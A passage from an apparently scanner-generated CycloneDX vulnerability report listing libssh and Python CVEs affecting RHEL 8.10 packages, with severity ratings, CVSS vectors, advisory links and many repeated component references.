          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59848",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        770
      ],
      "description": "A flaw was found in libssh. A malicious SFTP server can send responses for unknown request IDs that libssh clients keep queued indefinitely, causing unbounded memory growth and client-side denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59848"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59848"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498181"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59848.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59848"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59848"
        }
      ],
      "published": "2026-07-21T14:16:34+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59850",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in libssh. If data packets are processed after a channel is closed, channel data callbacks can be invoked after the associated data has already been freed, leading to crashes or possible use-after-free conditions.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59850"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59850"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498183"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59850.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59850"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59850"
        }
      ],
      "published": "2026-07-21T15:16:37+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-6019",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.1,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        150,
        116
      ],
      "description": "http.cookies.Morsel.js_output() returns an inline <script> snippet and only escapes \" for JavaScript string context. It does not neutralize the HTML parser-sensitive sequence </script> inside the generated script element. Mitigation base64-encodes the cookie value to disallow escaping using cookie value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6019"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28247"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:28581"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6019"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/2460869"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460869"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6019"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-28581.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:28247"
        },
        {
          "url": "https://github.com/python/cpython/commit/3c59b8b53fc75c7f9578d16fb8201ceb43e8f76c"
        },
        {
          "url": "https://github.com/python/cpython/commit/76b3923d688c0efc580658476c5f525ec8735104"
        },
        {
          "url": "https://github.com/python/cpython/commit/f795e042043dfe26c42e1971d4502c1cdc4c65b8"
        },
        {
          "url": "https://github.com/python/cpython/issues/90309"
        },
        {
          "url": "https://github.com/python/cpython/pull/148848"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-6019.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-28581.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IVNWGV2BBNC3RHQAFS22UP4DY56SAXX3/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6019"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6019"
        }
      ],
      "published": "2026-04-22T20:16:42+00:00",
      "updated": "2026-07-27T17:34:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
